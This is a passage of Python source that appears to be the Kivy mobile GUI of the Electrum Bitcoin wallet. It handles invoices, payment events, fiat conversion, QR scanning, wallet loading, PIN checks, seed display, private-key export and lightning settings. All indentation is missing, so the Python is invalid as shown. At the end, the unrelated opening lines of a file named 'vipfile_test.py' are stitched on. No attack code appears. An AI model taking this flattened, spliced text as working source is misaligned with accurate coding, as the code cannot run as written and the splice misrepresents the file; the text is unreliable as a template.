self.send_screen.set_ln_invoice(invoice)
def on_new_intent(self, intent):
data = intent.getDataString()
if intent.getScheme() == 'bitcoin':
self.set_URI(data)
elif intent.getScheme() == 'lightning':
self.set_ln_invoice(data)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
if self.wallet:
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def on_request_status(self, event, key, status):
if key not in self.wallet.receive_requests:
return
self.update_tab('receive')
if self.request_popup and self.request_popup.key == key:
self.request_popup.update_status()
if status == PR_PAID:
self.show_info(_('Payment Received') + '\n' + key)
self._trigger_update_history()
def on_invoice_status(self, event, key):
req = self.wallet.get_invoice(key)
if req is None:
return
status = self.wallet.get_invoice_status(req)
# todo: update single item
self.update_tab('send')
if self.invoice_popup and self.invoice_popup.key == key:
self.invoice_popup.update_status()
def on_payment_succeeded(self, event, key):
self.show_info(_('Payment was sent'))
self._trigger_update_history()
def on_payment_failed(self, event, key, reason):
self.show_info(_('Payment failed') + '\n\n' + reason)
def _get_bu(self):
return self.electrum_config.get_base_unit()
def _set_bu(self, value):
self.electrum_config.set_base_unit(value)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return self.electrum_config.get_decimal_point()
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
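# Worked example (assuming the configured base unit is 'BTC', i.e. a decimal
# point of 8): get_amount('0.5 BTC') returns 50000000 satoshis;
# btc_to_fiat() and fiat_to_btc() run the same conversion through the
# exchange rate.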
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''The current screen orientation of the device the app is running on.
Can be one of `landscape` or `portrait`.
:data:`orientation` is a read-only `AliasProperty`. Defaults to 'landscape'.
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Tries to ascertain the kind of device the app is running on.
Can be one of `tablet` or `phone`.
:data:`ui_mode` is a read-only `AliasProperty`. Defaults to 'phone'.
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None # type: Optional[Abstract_Wallet]
self.pause_time = 0
self.asyncio_loop = asyncio.get_event_loop()
self.password = None
App.__init__(self)#, **kwargs)
self.electrum_config = config = kwargs.get('config', None) # type: SimpleConfig
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.server.host
self.server_port = str(net_params.server.port)
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', None) # type: Plugins
self.gui_object = kwargs.get('gui_object', None) # type: ElectrumGui
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
# cached dialogs
self._settings_dialog = None
self._channels_dialog = None
self._addresses_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
self.invoice_popup = None
self.request_popup = None
def on_pr(self, pr: 'PaymentRequest'):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = pr.get_id()
invoice = self.wallet.get_invoice(key) # FIXME wrong key...
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
elif pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bitcoin:'):
self.set_URI(data)
return
if data.startswith('channel_backup:'):
self.import_channel_backup(data[15:])
return
bolt11_invoice = maybe_extract_bolt11_invoice(data)
if bolt11_invoice is not None:
self.set_ln_invoice(bolt11_invoice)
return
# try to decode transaction
from electrum.transaction import tx_from_any
try:
tx = tx_from_any(data)
except Exception:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, is_lightning, key):
from .uix.dialogs.request_dialog import RequestDialog
self.request_popup = RequestDialog('Request', key)
self.request_popup.open()
def show_invoice(self, is_lightning, key):
from .uix.dialogs.invoice_dialog import InvoiceDialog
invoice = self.wallet.get_invoice(key)
if not invoice:
return
data = invoice.invoice if is_lightning else key
self.invoice_popup = InvoiceDialog('Invoice', data, key)
self.invoice_popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(title, data, show_text, failure_cb=on_qr_failure,
text_for_clipboard=text_for_clipboard)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
except Exception as e: # exc would otherwise get lost
send_exception_to_crash_reporter(e)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('electrum/gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def handle_crash_on_startup(func):
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as e:
from .uix.dialogs.crash_reporter import CrashReporter
# show the crash reporter, and when it's closed, shutdown the app
cr = CrashReporter(self, exctype=type(e), value=e, tb=e.__traceback__)
cr.on_dismiss = lambda: self.stop()
Clock.schedule_once(lambda _, cr=cr: cr.open(), 0)
return wrapper
@handle_crash_on_startup
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.process_time()))
Window.bind(size=self.on_size, on_keyboard=self.on_keyboard)
Window.bind(on_key_down=self.on_key_down)
#Window.softinput_mode = 'below_target'
self.on_size(Window, Window.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
util.register_callback(self.on_network_event, interests)
util.register_callback(self.on_fee, ['fee'])
util.register_callback(self.on_fee_histogram, ['fee_histogram'])
util.register_callback(self.on_quotes, ['on_quotes'])
util.register_callback(self.on_history, ['on_history'])
util.register_callback(self.on_channels, ['channels_updated'])
util.register_callback(self.on_channel, ['channel'])
util.register_callback(self.on_invoice_status, ['invoice_status'])
util.register_callback(self.on_request_status, ['request_status'])
util.register_callback(self.on_payment_failed, ['payment_failed'])
util.register_callback(self.on_payment_succeeded, ['payment_succeeded'])
util.register_callback(self.on_channel_db, ['channel_db'])
util.register_callback(self.set_num_peers, ['gossip_peers'])
util.register_callback(self.set_unknown_channels, ['unknown_channels'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True))
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def on_channel_db(self, event, num_nodes, num_channels, num_policies):
self.lightning_gossip_num_nodes = num_nodes
self.lightning_gossip_num_channels = num_channels
def set_num_peers(self, event, num_peers):
self.lightning_gossip_num_peers = num_peers
def set_unknown_channels(self, event, unknown):
self.lightning_gossip_num_queries = unknown
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, storage, db):
if storage:
wallet = Wallet(db, storage, config=self.electrum_config)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True),
ask_if_wizard=True)
def _on_decrypted_storage(self, storage: WalletStorage):
assert storage.is_past_initial_decryption()
db = WalletDB(storage.read(), manual_upgrades=False)
if db.requires_upgrade():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
wizard.upgrade_storage(storage, db)
else:
self.on_wizard_complete(None, storage, db)
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
else:
def launch_wizard():
d = OpenWalletDialog(self, path, self.on_open_wallet)
d.open()
if not ask_if_wizard:
launch_wizard()
else:
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_open_wallet(self, pw, storage):
if not storage.file_exists():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
wizard.run('new')
else:
try:
storage.decrypt(pw)
except StorageReadWriteError:
self.show_error(_("R/W error accessing path"))
return
self.password = pw
self._on_decrypted_storage(storage)
def on_stop(self):
Logger.info('on_stop')
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def lightning_open_channel_dialog(self):
d = LightningOpenChannelDialog(self)
d.open()
def lightning_channels_dialog(self):
if self._channels_dialog is None:
self._channels_dialog = LightningChannelsDialog(self)
self._channels_dialog.open()
def on_channel(self, evt, chan):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def on_channels(self, evt, wallet):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def wallets_dialog(self):
from .uix.dialogs.wallets import WalletDialog
dirname = os.path.dirname(self.electrum_config.get_wallet_path())
d = WalletDialog(dirname, self.load_wallet_by_name)
d.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
self.wallets_dialog()
elif name == 'status':
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
elif name.endswith("_dialog"):
getattr(self, name)()
else:
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize the UX part of Electrum. This function performs the basic
tasks of setting up the UI.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "electrum/gui/icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.server.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet: 'Abstract_Wallet'):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return
self.use_change = self.wallet.use_change
self.electrum_config.save_last_wallet(wallet)
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
l = int(self.wallet.lnworker.get_balance()) if self.wallet.lnworker else 0
text = self.format_amount(c + x + u + l)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.up_to_date:
self._trigger_update_status()
def get_max_amount(self):
from electrum.transaction import PartialTxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None)
if not inputs:
return ''
addr = None
if self.send_screen:
addr = str(self.send_screen.address)
if not addr:
addr = self.wallet.dummy_address()
outputs = [PartialTxOutput.from_address_and_value(addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(coins=inputs, outputs=outputs)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, 0, self.decimal_point(), is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, x) -> str:
if x is None:
return 'none'
if x == '!':
return 'max'
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000) + ' sat/byte'
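# Worked example (a sketch): a fee_rate of 1000 sat/kB is rendered as
# format_fee_satoshis(1.0) + ' sat/byte', i.e. roughly '1 sat/byte'.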
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
Logger.error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet and self.has_pin_code() and now - self.pause_time > 5*60:
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=None,
on_failure=self.stop)
d.open()
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label):
if not label.data:
return
self.qr_dialog(label.name, label.data, True)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://electrum/gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://electrum/gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble.
Parameters:
text: message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
icon: icon source to display (or a texture, when `text` == 'texture')
modal: whether to show the bubble as a modal view
'''
text = str(text) # so that we also handle e.g. Exception
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://electrum/gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def show_transaction(self, txid):
tx = self.wallet.db.get_transaction(txid)
if not tx and self.wallet.lnworker:
tx = self.wallet.lnworker.lnwatcher.db.get_transaction(txid)
if tx:
self.tx_dialog(tx)
else:
self.show_error(f'Transaction not found {txid}')
def lightning_tx_dialog(self, tx):
from .uix.dialogs.lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def addresses_dialog(self):
from .uix.dialogs.addresses import AddressesDialog
if self._addresses_dialog is None:
self._addresses_dialog = AddressesDialog(self)
self._addresses_dialog.update()
self._addresses_dialog.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.electrum_config.get('pin_code'):
msg += "\n" + _("Enter your PIN code to proceed")
on_success = lambda pw: f(*args, self.password)
d = PincodeDialog(
self,
message = msg,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=lambda: None)
d.open()
else:
d = Question(
msg,
lambda b: f(*args, self.password) if b else None,
yes_str=_("OK"),
no_str=_("Cancel"),
title=_("Confirm action"))
d.open()
def toggle_lightning(self):
if self.wallet.has_lightning():
if not bool(self.wallet.lnworker.channels):
warning = _('This will delete your lightning private keys')
d = Question(_('Disable Lightning?') + '\n\n' + warning, self._disable_lightning)
d.open()
else:
self.show_info('This wallet has channels')
else:
warning1 = _("Lightning support in Electrum is experimental. Do not put large amounts in lightning channels.")
warning2 = _("Funds stored in lightning channels are not recoverable from your seed. You must backup your wallet file every time you create a new channel.")
d = Question(_('Enable Lightning?') + '\n\n' + warning1 + '\n\n' + warning2, self._enable_lightning)
d.open()
def _enable_lightning(self, b):
if not b:
return
wallet_path = self.get_wallet_path()
self.wallet.init_lightning()
self.show_info(_('Lightning keys have been initialized.'))
self.stop_wallet()
self.load_wallet_by_name(wallet_path)
def _disable_lightning(self, b):
if not b:
return
wallet_path = self.get_wallet_path()
self.wallet.remove_lightning()
self.show_info(_('Lightning keys have been removed.'))
self.stop_wallet()
self.load_wallet_by_name(wallet_path)
def delete_wallet(self):
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Are you sure you want to delete wallet {}?").format(basename),
self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except Exception:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path(use_gui_last_wallet=True)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Display your seed?"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
label.data = seed
if passphrase:
label.data += '\n\n' + _('Passphrase') + ': ' + passphrase
def has_pin_code(self):
return bool(self.electrum_config.get('pin_code'))
def check_pin_code(self, pin):
if pin != self.electrum_config.get('pin_code'):
raise InvalidPassword
def change_password(self, cb):
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.password = new_password
self.show_info(_("Your password was updated"))
on_failure = lambda: self.show_error(_("Password not updated"))
d = ChangePasswordDialog(self, self.wallet, on_success, on_failure)
d.open()
def change_pin_code(self, cb):
def on_success(old_password, new_password):
self.electrum_config.set_key('pin_code', new_password)
cb()
self.show_info(_("PIN updated") if new_password else _('PIN disabled'))
on_failure = lambda: self.show_error(_("PIN not updated"))
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=on_failure,
is_change=True,
has_password = self.has_pin_code())
d.open()
def save_backup(self):
if platform != 'android':
self._save_backup()
return
from android.permissions import request_permissions, Permission
def cb(permissions, grant_results: Sequence[bool]):
if not grant_results or not grant_results[0]:
self.show_error(_("Cannot save backup without STORAGE permission"))
return
# note: Clock.schedule_once is a hack so that we get called on a non-daemon thread
# (needed for WalletDB.write)
Clock.schedule_once(lambda dt: self._save_backup())
request_permissions([Permission.WRITE_EXTERNAL_STORAGE], cb)
def _save_backup(self):
new_path = self.wallet.save_backup()
if new_path:
self.show_info(_("Backup saved:") + f"\n{new_path}")
else:
self.show_error(_("Backup NOT saved. Backup directory not configured."))
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password))
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Decrypt your private key?"), show_private_key, (addr, pk_label))
def import_channel_backup(self, encrypted):
d = Question(_('Import Channel Backup?'), lambda b: self._import_channel_backup(b, encrypted))
d.open()
def _import_channel_backup(self, b, encrypted):
if not b:
return
try:
self.wallet.lnbackups.import_channel_backup(encrypted)
except Exception as e:
self.show_error("failed to import backup" + '\n' + str(e))
return
self.lightning_channels_dialog()
|
vipfile_test.py
|
"""Unit test for vipfile.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
